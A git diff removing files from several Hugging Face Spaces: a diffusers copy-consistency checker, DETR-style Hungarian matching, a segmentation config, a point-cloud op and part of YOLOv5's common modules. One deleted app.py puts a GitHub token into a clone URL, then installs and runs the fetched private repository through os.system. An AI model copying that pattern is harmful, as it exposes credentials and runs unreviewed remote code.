encoding="utf-8", newline="\n") as f: - lines = f.readlines() - - # Now let's find the class / func in the code! - indent = "" - line_index = 0 - for name in parts[i + 1 :]: - while ( - line_index < len(lines) and re.search(rf"^{indent}(class|def)\s+{name}(\(|\:)", lines[line_index]) is None - ): - line_index += 1 - indent += " " - line_index += 1 - - if line_index >= len(lines): - raise ValueError(f" {object_name} does not match any function or class in {module}.") - - # We found the beginning of the class / func, now let's find the end (when the indent diminishes). - start_index = line_index - while line_index < len(lines) and _should_continue(lines[line_index], indent): - line_index += 1 - # Clean up empty lines at the end (if any). - while len(lines[line_index - 1]) <= 1: - line_index -= 1 - - code_lines = lines[start_index:line_index] - return "".join(code_lines) - - -_re_copy_warning = re.compile(r"^(\s*)#\s*Copied from\s+diffusers\.(\S+\.\S+)\s*($|\S.*$)") -_re_replace_pattern = re.compile(r"^\s*(\S+)->(\S+)(\s+.*|$)") -_re_fill_pattern = re.compile(r"]*>") - - -def get_indent(code): - lines = code.split("\n") - idx = 0 - while idx < len(lines) and len(lines[idx]) == 0: - idx += 1 - if idx < len(lines): - return re.search(r"^(\s*)\S", lines[idx]).groups()[0] - return "" - - -def blackify(code): - """ - Applies the black part of our `make style` command to `code`. - """ - has_indent = len(get_indent(code)) > 0 - if has_indent: - code = f"class Bla:\n{code}" - mode = black.Mode(target_versions={black.TargetVersion.PY37}, line_length=119, preview=True) - result = black.format_str(code, mode=mode) - result, _ = style_docstrings_in_code(result) - return result[len("class Bla:\n") :] if has_indent else result - - -def is_copy_consistent(filename, overwrite=False): - """ - Check if the code commented as a copy in `filename` matches the original. - Return the differences or overwrites the content depending on `overwrite`. - """ - with open(filename, "r", encoding="utf-8", newline="\n") as f: - lines = f.readlines() - diffs = [] - line_index = 0 - # Not a for loop cause `lines` is going to change (if `overwrite=True`). - while line_index < len(lines): - search = _re_copy_warning.search(lines[line_index]) - if search is None: - line_index += 1 - continue - - # There is some copied code here, let's retrieve the original. 
- indent, object_name, replace_pattern = search.groups() - theoretical_code = find_code_in_diffusers(object_name) - theoretical_indent = get_indent(theoretical_code) - - start_index = line_index + 1 if indent == theoretical_indent else line_index + 2 - indent = theoretical_indent - line_index = start_index - - # Loop to check the observed code, stop when indentation diminishes or if we see a End copy comment. - should_continue = True - while line_index < len(lines) and should_continue: - line_index += 1 - if line_index >= len(lines): - break - line = lines[line_index] - should_continue = _should_continue(line, indent) and re.search(f"^{indent}# End copy", line) is None - # Clean up empty lines at the end (if any). - while len(lines[line_index - 1]) <= 1: - line_index -= 1 - - observed_code_lines = lines[start_index:line_index] - observed_code = "".join(observed_code_lines) - - # Remove any nested `Copied from` comments to avoid circular copies - theoretical_code = [line for line in theoretical_code.split("\n") if _re_copy_warning.search(line) is None] - theoretical_code = "\n".join(theoretical_code) - - # Before comparing, use the `replace_pattern` on the original code. - if len(replace_pattern) > 0: - patterns = replace_pattern.replace("with", "").split(",") - patterns = [_re_replace_pattern.search(p) for p in patterns] - for pattern in patterns: - if pattern is None: - continue - obj1, obj2, option = pattern.groups() - theoretical_code = re.sub(obj1, obj2, theoretical_code) - if option.strip() == "all-casing": - theoretical_code = re.sub(obj1.lower(), obj2.lower(), theoretical_code) - theoretical_code = re.sub(obj1.upper(), obj2.upper(), theoretical_code) - - # Blackify after replacement. To be able to do that, we need the header (class or function definition) - # from the previous line - theoretical_code = blackify(lines[start_index - 1] + theoretical_code) - theoretical_code = theoretical_code[len(lines[start_index - 1]) :] - - # Test for a diff and act accordingly. - if observed_code != theoretical_code: - diffs.append([object_name, start_index]) - if overwrite: - lines = lines[:start_index] + [theoretical_code] + lines[line_index:] - line_index = start_index + 1 - - if overwrite and len(diffs) > 0: - # Warn the user a file has been modified. - print(f"Detected changes, rewriting {filename}.") - with open(filename, "w", encoding="utf-8", newline="\n") as f: - f.writelines(lines) - return diffs - - -def check_copies(overwrite: bool = False): - all_files = glob.glob(os.path.join(DIFFUSERS_PATH, "**/*.py"), recursive=True) - diffs = [] - for filename in all_files: - new_diffs = is_copy_consistent(filename, overwrite) - diffs += [f"- {filename}: copy does not match {d[0]} at line {d[1]}" for d in new_diffs] - if not overwrite and len(diffs) > 0: - diff = "\n".join(diffs) - raise Exception( - "Found the following copy inconsistencies:\n" - + diff - + "\nRun `make fix-copies` or `python utils/check_copies.py --fix_and_overwrite` to fix them." 
- ) - - -if __name__ == "__main__": - parser = argparse.ArgumentParser() - parser.add_argument("--fix_and_overwrite", action="store_true", help="Whether to fix inconsistencies.") - args = parser.parse_args() - - check_copies(args.fix_and_overwrite) diff --git a/spaces/Andy1621/uniformer_image_detection/mmdet/core/bbox/assigners/hungarian_assigner.py b/spaces/Andy1621/uniformer_image_detection/mmdet/core/bbox/assigners/hungarian_assigner.py deleted file mode 100644 index e10cc14afac4ddfcb9395c1a250ece1fbfe3263c..0000000000000000000000000000000000000000 --- a/spaces/Andy1621/uniformer_image_detection/mmdet/core/bbox/assigners/hungarian_assigner.py +++ /dev/null @@ -1,145 +0,0 @@ -import torch - -from ..builder import BBOX_ASSIGNERS -from ..match_costs import build_match_cost -from ..transforms import bbox_cxcywh_to_xyxy -from .assign_result import AssignResult -from .base_assigner import BaseAssigner - -try: - from scipy.optimize import linear_sum_assignment -except ImportError: - linear_sum_assignment = None - - -@BBOX_ASSIGNERS.register_module() -class HungarianAssigner(BaseAssigner): - """Computes one-to-one matching between predictions and ground truth. - - This class computes an assignment between the targets and the predictions - based on the costs. The costs are weighted sum of three components: - classification cost, regression L1 cost and regression iou cost. The - targets don't include the no_object, so generally there are more - predictions than targets. After the one-to-one matching, the un-matched - are treated as backgrounds. Thus each query prediction will be assigned - with `0` or a positive integer indicating the ground truth index: - - - 0: negative sample, no assigned gt - - positive integer: positive sample, index (1-based) of assigned gt - - Args: - cls_weight (int | float, optional): The scale factor for classification - cost. Default 1.0. - bbox_weight (int | float, optional): The scale factor for regression - L1 cost. Default 1.0. - iou_weight (int | float, optional): The scale factor for regression - iou cost. Default 1.0. - iou_calculator (dict | optional): The config for the iou calculation. - Default type `BboxOverlaps2D`. - iou_mode (str | optional): "iou" (intersection over union), "iof" - (intersection over foreground), or "giou" (generalized - intersection over union). Default "giou". - """ - - def __init__(self, - cls_cost=dict(type='ClassificationCost', weight=1.), - reg_cost=dict(type='BBoxL1Cost', weight=1.0), - iou_cost=dict(type='IoUCost', iou_mode='giou', weight=1.0)): - self.cls_cost = build_match_cost(cls_cost) - self.reg_cost = build_match_cost(reg_cost) - self.iou_cost = build_match_cost(iou_cost) - - def assign(self, - bbox_pred, - cls_pred, - gt_bboxes, - gt_labels, - img_meta, - gt_bboxes_ignore=None, - eps=1e-7): - """Computes one-to-one matching based on the weighted costs. - - This method assign each query prediction to a ground truth or - background. The `assigned_gt_inds` with -1 means don't care, - 0 means negative sample, and positive number is the index (1-based) - of assigned gt. - The assignment is done in the following steps, the order matters. - - 1. assign every prediction to -1 - 2. compute the weighted costs - 3. do Hungarian matching on CPU based on the costs - 4. assign all to 0 (background) first, then for each matched pair - between predictions and gts, treat this prediction as foreground - and assign the corresponding gt index (plus 1) to it. 
- - Args: - bbox_pred (Tensor): Predicted boxes with normalized coordinates - (cx, cy, w, h), which are all in range [0, 1]. Shape - [num_query, 4]. - cls_pred (Tensor): Predicted classification logits, shape - [num_query, num_class]. - gt_bboxes (Tensor): Ground truth boxes with unnormalized - coordinates (x1, y1, x2, y2). Shape [num_gt, 4]. - gt_labels (Tensor): Label of `gt_bboxes`, shape (num_gt,). - img_meta (dict): Meta information for current image. - gt_bboxes_ignore (Tensor, optional): Ground truth bboxes that are - labelled as `ignored`. Default None. - eps (int | float, optional): A value added to the denominator for - numerical stability. Default 1e-7. - - Returns: - :obj:`AssignResult`: The assigned result. - """ - assert gt_bboxes_ignore is None, \ - 'Only case when gt_bboxes_ignore is None is supported.' - num_gts, num_bboxes = gt_bboxes.size(0), bbox_pred.size(0) - - # 1. assign -1 by default - assigned_gt_inds = bbox_pred.new_full((num_bboxes, ), - -1, - dtype=torch.long) - assigned_labels = bbox_pred.new_full((num_bboxes, ), - -1, - dtype=torch.long) - if num_gts == 0 or num_bboxes == 0: - # No ground truth or boxes, return empty assignment - if num_gts == 0: - # No ground truth, assign all to background - assigned_gt_inds[:] = 0 - return AssignResult( - num_gts, assigned_gt_inds, None, labels=assigned_labels) - img_h, img_w, _ = img_meta['img_shape'] - factor = gt_bboxes.new_tensor([img_w, img_h, img_w, - img_h]).unsqueeze(0) - - # 2. compute the weighted costs - # classification and bboxcost. - cls_cost = self.cls_cost(cls_pred, gt_labels) - # regression L1 cost - normalize_gt_bboxes = gt_bboxes / factor - reg_cost = self.reg_cost(bbox_pred, normalize_gt_bboxes) - # regression iou cost, defaultly giou is used in official DETR. - bboxes = bbox_cxcywh_to_xyxy(bbox_pred) * factor - iou_cost = self.iou_cost(bboxes, gt_bboxes) - # weighted sum of above three costs - cost = cls_cost + reg_cost + iou_cost - - # 3. do Hungarian matching on CPU using linear_sum_assignment - cost = cost.detach().cpu() - if linear_sum_assignment is None: - raise ImportError('Please run "pip install scipy" ' - 'to install scipy first.') - matched_row_inds, matched_col_inds = linear_sum_assignment(cost) - matched_row_inds = torch.from_numpy(matched_row_inds).to( - bbox_pred.device) - matched_col_inds = torch.from_numpy(matched_col_inds).to( - bbox_pred.device) - - # 4. 
assign backgrounds and foregrounds - # assign all indices to backgrounds first - assigned_gt_inds[:] = 0 - # assign foregrounds based on matching results - assigned_gt_inds[matched_row_inds] = matched_col_inds + 1 - assigned_labels[matched_row_inds] = gt_labels[matched_col_inds] - return AssignResult( - num_gts, assigned_gt_inds, None, labels=assigned_labels) diff --git a/spaces/Andy1621/uniformer_image_segmentation/configs/deeplabv3plus/deeplabv3plus_r50-d8_480x480_40k_pascal_context.py b/spaces/Andy1621/uniformer_image_segmentation/configs/deeplabv3plus/deeplabv3plus_r50-d8_480x480_40k_pascal_context.py deleted file mode 100644 index 318845de1e2124a4dff3348749ec5a13d78d686f..0000000000000000000000000000000000000000 --- a/spaces/Andy1621/uniformer_image_segmentation/configs/deeplabv3plus/deeplabv3plus_r50-d8_480x480_40k_pascal_context.py +++ /dev/null @@ -1,10 +0,0 @@ -_base_ = [ - '../_base_/models/deeplabv3plus_r50-d8.py', - '../_base_/datasets/pascal_context.py', '../_base_/default_runtime.py', - '../_base_/schedules/schedule_40k.py' -] -model = dict( - decode_head=dict(num_classes=60), - auxiliary_head=dict(num_classes=60), - test_cfg=dict(mode='slide', crop_size=(480, 480), stride=(320, 320))) -optimizer = dict(type='SGD', lr=0.004, momentum=0.9, weight_decay=0.0001) diff --git a/spaces/AnnonSubmission/xai-cl/README.md b/spaces/AnnonSubmission/xai-cl/README.md deleted file mode 100644 index b196cbedb3e6604ddd8182d2a0f0978d92fc139d..0000000000000000000000000000000000000000 --- a/spaces/AnnonSubmission/xai-cl/README.md +++ /dev/null @@ -1,12 +0,0 @@ ---- -title: Xai Cl -emoji: 🏢 -colorFrom: gray -colorTo: red -sdk: gradio -sdk_version: 3.10.1 -app_file: app.py -pinned: false ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/Annotation-AI/fast-segment-everything-with-image-prompt/app.py b/spaces/Annotation-AI/fast-segment-everything-with-image-prompt/app.py deleted file mode 100644 index 572ad0b5860a938796ac7f8018535570db0ca166..0000000000000000000000000000000000000000 --- a/spaces/Annotation-AI/fast-segment-everything-with-image-prompt/app.py +++ /dev/null @@ -1,17 +0,0 @@ -import os - - -github_user = os.environ.get("GITHUB_USER") -github_token = os.environ.get("GITHUB_TOKEN") - -repo_name = "annotation-ai/mlwiz-technical-demo" - -os.system(f"export GITHUB_USER={github_user}") -os.system(f"export GITHUB_TOKEN={github_token}") -os.system(f"git clone https://{github_user}:{github_token}@github.com/{repo_name}") - -cwd0 = os.getcwd() -cwd1 = os.path.join(cwd0, "mlwiz-technical-demo/sam") -os.chdir(cwd1) -os.system("pip install -r requirements.txt") -os.system("python app_everything_img.py") diff --git a/spaces/Anonymous-sub/Rerender/ControlNet/annotator/uniformer/mmcv/ops/ball_query.py b/spaces/Anonymous-sub/Rerender/ControlNet/annotator/uniformer/mmcv/ops/ball_query.py deleted file mode 100644 index d0466847c6e5c1239e359a0397568413ebc1504a..0000000000000000000000000000000000000000 --- a/spaces/Anonymous-sub/Rerender/ControlNet/annotator/uniformer/mmcv/ops/ball_query.py +++ /dev/null @@ -1,55 +0,0 @@ -# Copyright (c) OpenMMLab. All rights reserved. 
-import torch -from torch.autograd import Function - -from ..utils import ext_loader - -ext_module = ext_loader.load_ext('_ext', ['ball_query_forward']) - - -class BallQuery(Function): - """Find nearby points in spherical space.""" - - @staticmethod - def forward(ctx, min_radius: float, max_radius: float, sample_num: int, - xyz: torch.Tensor, center_xyz: torch.Tensor) -> torch.Tensor: - """ - Args: - min_radius (float): minimum radius of the balls. - max_radius (float): maximum radius of the balls. - sample_num (int): maximum number of features in the balls. - xyz (Tensor): (B, N, 3) xyz coordinates of the features. - center_xyz (Tensor): (B, npoint, 3) centers of the ball query. - - Returns: - Tensor: (B, npoint, nsample) tensor with the indices of - the features that form the query balls. - """ - assert center_xyz.is_contiguous() - assert xyz.is_contiguous() - assert min_radius < max_radius - - B, N, _ = xyz.size() - npoint = center_xyz.size(1) - idx = xyz.new_zeros(B, npoint, sample_num, dtype=torch.int) - - ext_module.ball_query_forward( - center_xyz, - xyz, - idx, - b=B, - n=N, - m=npoint, - min_radius=min_radius, - max_radius=max_radius, - nsample=sample_num) - if torch.__version__ != 'parrots': - ctx.mark_non_differentiable(idx) - return idx - - @staticmethod - def backward(ctx, a=None): - return None, None, None, None - - -ball_query = BallQuery.apply diff --git a/spaces/Ariharasudhan/YoloV5/models/common.py b/spaces/Ariharasudhan/YoloV5/models/common.py deleted file mode 100644 index 64f1b9354225a69b3fcd977ad3647a9ece141bfe..0000000000000000000000000000000000000000 --- a/spaces/Ariharasudhan/YoloV5/models/common.py +++ /dev/null @@ -1,860 +0,0 @@ -# YOLOv5 🚀 by Ultralytics, GPL-3.0 license -""" -Common modules -""" - -import ast -import contextlib -import json -import math -import platform -import warnings -import zipfile -from collections import OrderedDict, namedtuple -from copy import copy -from pathlib import Path -from urllib.parse import urlparse - -import cv2 -import numpy as np -import pandas as pd -import requests -import torch -import torch.nn as nn -from IPython.display import display -from PIL import Image -from torch.cuda import amp - -from utils import TryExcept -from utils.dataloaders import exif_transpose, letterbox -from utils.general import (LOGGER, ROOT, Profile, check_requirements, check_suffix, check_version, colorstr, - increment_path, is_notebook, make_divisible, non_max_suppression, scale_boxes, xywh2xyxy, - xyxy2xywh, yaml_load) -from utils.plots import Annotator, colors, save_one_box -from utils.torch_utils import copy_attr, smart_inference_mode - - -def autopad(k, p=None, d=1): # kernel, padding, dilation - # Pad to 'same' shape outputs - if d > 1: - k = d * (k - 1) + 1 if isinstance(k, int) else [d * (x - 1) + 1 for x in k] # actual kernel-size - if p is None: - p = k // 2 if isinstance(k, int) else [x // 2 for x in k] # auto-pad - return p - - -class Conv(nn.Module): - # Standard convolution with args(ch_in, ch_out, kernel, stride, padding, groups, dilation, activation) - default_act = nn.SiLU() # default activation - - def __init__(self, c1, c2, k=1, s=1, p=None, g=1, d=1, act=True): - super().__init__() - self.conv = nn.Conv2d(c1, c2, k, s, autopad(k, p, d), groups=g, dilation=d, bias=False) - self.bn = nn.BatchNorm2d(c2) - self.act = self.default_act if act is True else act if isinstance(act, nn.Module) else nn.Identity() - - def forward(self, x): - return self.act(self.bn(self.conv(x))) - - def forward_fuse(self, x): - return self.act(self.conv(x)) 
- - -class DWConv(Conv): - # Depth-wise convolution - def __init__(self, c1, c2, k=1, s=1, d=1, act=True): # ch_in, ch_out, kernel, stride, dilation, activation - super().__init__(c1, c2, k, s, g=math.gcd(c1, c2), d=d, act=act) - - -class DWConvTranspose2d(nn.ConvTranspose2d): - # Depth-wise transpose convolution - def __init__(self, c1, c2, k=1, s=1, p1=0, p2=0): # ch_in, ch_out, kernel, stride, padding, padding_out - super().__init__(c1, c2, k, s, p1, p2, groups=math.gcd(c1, c2)) - - -class TransformerLayer(nn.Module): - # Transformer layer https://arxiv.org/abs/2010.11929 (LayerNorm layers removed for better performance) - def __init__(self, c, num_heads): - super().__init__() - self.q = nn.Linear(c, c, bias=False) - self.k = nn.Linear(c, c, bias=False) - self.v = nn.Linear(c, c, bias=False) - self.ma = nn.MultiheadAttention(embed_dim=c, num_heads=num_heads) - self.fc1 = nn.Linear(c, c, bias=False) - self.fc2 = nn.Linear(c, c, bias=False) - - def forward(self, x): - x = self.ma(self.q(x), self.k(x), self.v(x))[0] + x - x = self.fc2(self.fc1(x)) + x - return x - - -class TransformerBlock(nn.Module): - # Vision Transformer https://arxiv.org/abs/2010.11929 - def __init__(self, c1, c2, num_heads, num_layers): - super().__init__() - self.conv = None - if c1 != c2: - self.conv = Conv(c1, c2) - self.linear = nn.Linear(c2, c2) # learnable position embedding - self.tr = nn.Sequential(*(TransformerLayer(c2, num_heads) for _ in range(num_layers))) - self.c2 = c2 - - def forward(self, x): - if self.conv is not None: - x = self.conv(x) - b, _, w, h = x.shape - p = x.flatten(2).permute(2, 0, 1) - return self.tr(p + self.linear(p)).permute(1, 2, 0).reshape(b, self.c2, w, h) - - -class Bottleneck(nn.Module): - # Standard bottleneck - def __init__(self, c1, c2, shortcut=True, g=1, e=0.5): # ch_in, ch_out, shortcut, groups, expansion - super().__init__() - c_ = int(c2 * e) # hidden channels - self.cv1 = Conv(c1, c_, 1, 1) - self.cv2 = Conv(c_, c2, 3, 1, g=g) - self.add = shortcut and c1 == c2 - - def forward(self, x): - return x + self.cv2(self.cv1(x)) if self.add else self.cv2(self.cv1(x)) - - -class BottleneckCSP(nn.Module): - # CSP Bottleneck https://github.com/WongKinYiu/CrossStagePartialNetworks - def __init__(self, c1, c2, n=1, shortcut=True, g=1, e=0.5): # ch_in, ch_out, number, shortcut, groups, expansion - super().__init__() - c_ = int(c2 * e) # hidden channels - self.cv1 = Conv(c1, c_, 1, 1) - self.cv2 = nn.Conv2d(c1, c_, 1, 1, bias=False) - self.cv3 = nn.Conv2d(c_, c_, 1, 1, bias=False) - self.cv4 = Conv(2 * c_, c2, 1, 1) - self.bn = nn.BatchNorm2d(2 * c_) # applied to cat(cv2, cv3) - self.act = nn.SiLU() - self.m = nn.Sequential(*(Bottleneck(c_, c_, shortcut, g, e=1.0) for _ in range(n))) - - def forward(self, x): - y1 = self.cv3(self.m(self.cv1(x))) - y2 = self.cv2(x) - return self.cv4(self.act(self.bn(torch.cat((y1, y2), 1)))) - - -class CrossConv(nn.Module): - # Cross Convolution Downsample - def __init__(self, c1, c2, k=3, s=1, g=1, e=1.0, shortcut=False): - # ch_in, ch_out, kernel, stride, groups, expansion, shortcut - super().__init__() - c_ = int(c2 * e) # hidden channels - self.cv1 = Conv(c1, c_, (1, k), (1, s)) - self.cv2 = Conv(c_, c2, (k, 1), (s, 1), g=g) - self.add = shortcut and c1 == c2 - - def forward(self, x): - return x + self.cv2(self.cv1(x)) if self.add else self.cv2(self.cv1(x)) - - -class C3(nn.Module): - # CSP Bottleneck with 3 convolutions - def __init__(self, c1, c2, n=1, shortcut=True, g=1, e=0.5): # ch_in, ch_out, number, shortcut, groups, expansion - 
super().__init__() - c_ = int(c2 * e) # hidden channels - self.cv1 = Conv(c1, c_, 1, 1) - self.cv2 = Conv(c1, c_, 1, 1) - self.cv3 = Conv(2 * c_, c2, 1) # optional act=FReLU(c2) - self.m = nn.Sequential(*(Bottleneck(c_, c_, shortcut, g, e=1.0) for _ in range(n))) - - def forward(self, x): - return self.cv3(torch.cat((self.m(self.cv1(x)), self.cv2(x)), 1)) - - -class C3x(C3): - # C3 module with cross-convolutions - def __init__(self, c1, c2, n=1, shortcut=True, g=1, e=0.5): - super().__init__(c1, c2, n, shortcut, g, e) - c_ = int(c2 * e) - self.m = nn.Sequential(*(CrossConv(c_, c_, 3, 1, g, 1.0, shortcut) for _ in range(n))) - - -class C3TR(C3): - # C3 module with TransformerBlock() - def __init__(self, c1, c2, n=1, shortcut=True, g=1, e=0.5): - super().__init__(c1, c2, n, shortcut, g, e) - c_ = int(c2 * e) - self.m = TransformerBlock(c_, c_, 4, n) - - -class C3SPP(C3): - # C3 module with SPP() - def __init__(self, c1, c2, k=(5, 9, 13), n=1, shortcut=True, g=1, e=0.5): - super().__init__(c1, c2, n, shortcut, g, e) - c_ = int(c2 * e) - self.m = SPP(c_, c_, k) - - -class C3Ghost(C3): - # C3 module with GhostBottleneck() - def __init__(self, c1, c2, n=1, shortcut=True, g=1, e=0.5): - super().__init__(c1, c2, n, shortcut, g, e) - c_ = int(c2 * e) # hidden channels - self.m = nn.Sequential(*(GhostBottleneck(c_, c_) for _ in range(n))) - - -class SPP(nn.Module): - # Spatial Pyramid Pooling (SPP) layer https://arxiv.org/abs/1406.4729 - def __init__(self, c1, c2, k=(5, 9, 13)): - super().__init__() - c_ = c1 // 2 # hidden channels - self.cv1 = Conv(c1, c_, 1, 1) - self.cv2 = Conv(c_ * (len(k) + 1), c2, 1, 1) - self.m = nn.ModuleList([nn.MaxPool2d(kernel_size=x, stride=1, padding=x // 2) for x in k]) - - def forward(self, x): - x = self.cv1(x) - with warnings.catch_warnings(): - warnings.simplefilter('ignore') # suppress torch 1.9.0 max_pool2d() warning - return self.cv2(torch.cat([x] + [m(x) for m in self.m], 1)) - - -class SPPF(nn.Module): - # Spatial Pyramid Pooling - Fast (SPPF) layer for YOLOv5 by Glenn Jocher - def __init__(self, c1, c2, k=5): # equivalent to SPP(k=(5, 9, 13)) - super().__init__() - c_ = c1 // 2 # hidden channels - self.cv1 = Conv(c1, c_, 1, 1) - self.cv2 = Conv(c_ * 4, c2, 1, 1) - self.m = nn.MaxPool2d(kernel_size=k, stride=1, padding=k // 2) - - def forward(self, x): - x = self.cv1(x) - with warnings.catch_warnings(): - warnings.simplefilter('ignore') # suppress torch 1.9.0 max_pool2d() warning - y1 = self.m(x) - y2 = self.m(y1) - return self.cv2(torch.cat((x, y1, y2, self.m(y2)), 1)) - - -class Focus(nn.Module): - # Focus wh information into c-space - def __init__(self, c1, c2, k=1, s=1, p=None, g=1, act=True): # ch_in, ch_out, kernel, stride, padding, groups - super().__init__() - self.conv = Conv(c1 * 4, c2, k, s, p, g, act=act) - # self.contract = Contract(gain=2) - - def forward(self, x): # x(b,c,w,h) -> y(b,4c,w/2,h/2) - return self.conv(torch.cat((x[..., ::2, ::2], x[..., 1::2, ::2], x[..., ::2, 1::2], x[..., 1::2, 1::2]), 1)) - # return self.conv(self.contract(x)) - - -class GhostConv(nn.Module): - # Ghost Convolution https://github.com/huawei-noah/ghostnet - def __init__(self, c1, c2, k=1, s=1, g=1, act=True): # ch_in, ch_out, kernel, stride, groups - super().__init__() - c_ = c2 // 2 # hidden channels - self.cv1 = Conv(c1, c_, k, s, None, g, act=act) - self.cv2 = Conv(c_, c_, 5, 1, None, c_, act=act) - - def forward(self, x): - y = self.cv1(x) - return torch.cat((y, self.cv2(y)), 1) - - -class GhostBottleneck(nn.Module): - # Ghost Bottleneck 
https://github.com/huawei-noah/ghostnet - def __init__(self, c1, c2, k=3, s=1): # ch_in, ch_out, kernel, stride - super().__init__() - c_ = c2 // 2 - self.conv = nn.Sequential( - GhostConv(c1, c_, 1, 1), # pw - DWConv(c_, c_, k, s, act=False) if s == 2 else nn.Identity(), # dw - GhostConv(c_, c2, 1, 1, act=False)) # pw-linear - self.shortcut = nn.Sequential(DWConv(c1, c1, k, s, act=False), Conv(c1, c2, 1, 1, - act=False)) if s == 2 else nn.Identity() - - def forward(self, x): - return self.conv(x) + self.shortcut(x) - - -class Contract(nn.Module): - # Contract width-height into channels, i.e. x(1,64,80,80) to x(1,256,40,40) - def __init__(self, gain=2): - super().__init__() - self.gain = gain - - def forward(self, x): - b, c, h, w = x.size() # assert (h / s == 0) and (W / s == 0), 'Indivisible gain' - s = self.gain - x = x.view(b, c, h // s, s, w // s, s) # x(1,64,40,2,40,2) - x = x.permute(0, 3, 5, 1, 2, 4).contiguous() # x(1,2,2,64,40,40) - return x.view(b, c * s * s, h // s, w // s) # x(1,256,40,40) - - -class Expand(nn.Module): - # Expand channels into width-height, i.e. x(1,64,80,80) to x(1,16,160,160) - def __init__(self, gain=2): - super().__init__() - self.gain = gain - - def forward(self, x): - b, c, h, w = x.size() # assert C / s ** 2 == 0, 'Indivisible gain' - s = self.gain - x = x.view(b, s, s, c // s ** 2, h, w) # x(1,2,2,16,80,80) - x = x.permute(0, 3, 4, 1, 5, 2).contiguous() # x(1,16,80,2,80,2) - return x.view(b, c // s ** 2, h * s, w * s) # x(1,16,160,160) - - -class Concat(nn.Module): - # Concatenate a list of tensors along dimension - def __init__(self, dimension=1): - super().__init__() - self.d = dimension - - def forward(self, x): - return torch.cat(x, self.d) - - -class DetectMultiBackend(nn.Module): - # YOLOv5 MultiBackend class for python inference on various backends - def __init__(self, weights='yolov5s.pt', device=torch.device('cpu'), dnn=False, data=None, fp16=False, fuse=True): - # Usage: - # PyTorch: weights = *.pt - # TorchScript: *.torchscript - # ONNX Runtime: *.onnx - # ONNX OpenCV DNN: *.onnx --dnn - # OpenVINO: *_openvino_model - # CoreML: *.mlmodel - # TensorRT: *.engine - # TensorFlow SavedModel: *_saved_model - # TensorFlow GraphDef: *.pb - # TensorFlow Lite: *.tflite - # TensorFlow Edge TPU: *_edgetpu.tflite - # PaddlePaddle: *_paddle_model - from models.experimental import attempt_download, attempt_load # scoped to avoid circular import - - super().__init__() - w = str(weights[0] if isinstance(weights, list) else weights) - pt, jit, onnx, xml, engine, coreml, saved_model, pb, tflite, edgetpu, tfjs, paddle, triton = self._model_type(w) - fp16 &= pt or jit or onnx or engine # FP16 - nhwc = coreml or saved_model or pb or tflite or edgetpu # BHWC formats (vs torch BCWH) - stride = 32 # default stride - cuda = torch.cuda.is_available() and device.type != 'cpu' # use CUDA - if not (pt or triton): - w = attempt_download(w) # download if not local - - if pt: # PyTorch - model = attempt_load(weights if isinstance(weights, list) else w, device=device, inplace=True, fuse=fuse) - stride = max(int(model.stride.max()), 32) # model stride - names = model.module.names if hasattr(model, 'module') else model.names # get class names - model.half() if fp16 else model.float() - self.model = model # explicitly assign for to(), cpu(), cuda(), half() - elif jit: # TorchScript - LOGGER.info(f'Loading {w} for TorchScript inference...') - extra_files = {'config.txt': ''} # model metadata - model = torch.jit.load(w, _extra_files=extra_files, map_location=device) - 
model.half() if fp16 else model.float() - if extra_files['config.txt']: # load metadata dict - d = json.loads(extra_files['config.txt'], - object_hook=lambda d: {int(k) if k.isdigit() else k: v - for k, v in d.items()}) - stride, names = int(d['stride']), d['names'] - elif dnn: # ONNX OpenCV DNN - LOGGER.info(f'Loading {w} for ONNX OpenCV DNN inference...') - check_requirements('opencv-python>=4.5.4') - net = cv2.dnn.readNetFromONNX(w) - elif onnx: # ONNX Runtime - LOGGER.info(f'Loading {w} for ONNX Runtime inference...') - check_requirements(('onnx', 'onnxruntime-gpu' if cuda else 'onnxruntime')) - import onnxruntime - providers = ['CUDAExecutionProvider', 'CPUExecutionProvider'] if cuda else ['CPUExecutionProvider'] - session = onnxruntime.InferenceSession(w, providers=providers) - output_names = [x.name for x in session.get_outputs()] - meta = session.get_modelmeta().custom_metadata_map # metadata - if 'stride' in meta: - stride, names = int(meta['stride']), eval(meta['names']) - elif xml: # OpenVINO - LOGGER.info(f'Loading {w} for OpenVINO inference...') - check_requirements('openvino') # requires openvino-dev: https://pypi.org/project/openvino-dev/ - from openvino.runtime import Core, Layout, get_batch - ie = Core() - if not Path(w).is_file(): # if not *.xml - w = next(Path(w).glob('*.xml')) # get *.xml file from *_openvino_model dir - network = ie.read_model(model=w, weights=Path(w).with_suffix('.bin')) - if network.get_parameters()[0].get_layout().empty: - network.get_parameters()[0].set_layout(Layout("NCHW")) - batch_dim = get_batch(network) - if batch_dim.is_static: - batch_size = batch_dim.get_length() - executable_network = ie.compile_model(network, device_name="CPU") # device_name="MYRIAD" for Intel NCS2 - stride, names = self._load_metadata(Path(w).with_suffix('.yaml')) # load metadata - elif engine: # TensorRT - LOGGER.info(f'Loading {w} for TensorRT inference...') - import tensorrt as trt # https://developer.nvidia.com/nvidia-tensorrt-download - check_version(trt.__version__, '7.0.0', hard=True) # require tensorrt>=7.0.0 - if device.type == 'cpu': - device = torch.device('cuda:0') - Binding = namedtuple('Binding', ('name', 'dtype', 'shape', 'data', 'ptr')) - logger = trt.Logger(trt.Logger.INFO) - with open(w, 'rb') as f, trt.Runtime(logger) as runtime: - model = runtime.deserialize_cuda_engine(f.read()) - context = model.create_execution_context() - bindings = OrderedDict() - output_names = [] - fp16 = False # default updated below - dynamic = False - for i in range(model.num_bindings): - name = model.get_binding_name(i) - dtype = trt.nptype(model.get_binding_dtype(i)) - if model.binding_is_input(i): - if -1 in tuple(model.get_binding_shape(i)): # dynamic - dynamic = True - context.set_binding_shape(i, tuple(model.get_profile_shape(0, i)[2])) - if dtype == np.float16: - fp16 = True - else: # output - output_names.append(name) - shape = tuple(context.get_binding_shape(i)) - im = torch.from_numpy(np.empty(shape, dtype=dtype)).to(device) - bindings[name] = Binding(name, dtype, shape, im, int(im.data_ptr())) - binding_addrs = OrderedDict((n, d.ptr) for n, d in bindings.items()) - batch_size = bindings['images'].shape[0] # if dynamic, this is instead max batch size - elif coreml: # CoreML - LOGGER.info(f'Loading {w} for CoreML inference...') - import coremltools as ct - model = ct.models.MLModel(w) - elif saved_model: # TF SavedModel - LOGGER.info(f'Loading {w} for TensorFlow SavedModel inference...') - import tensorflow as tf - keras = False # assume TF1 saved_model - model = 
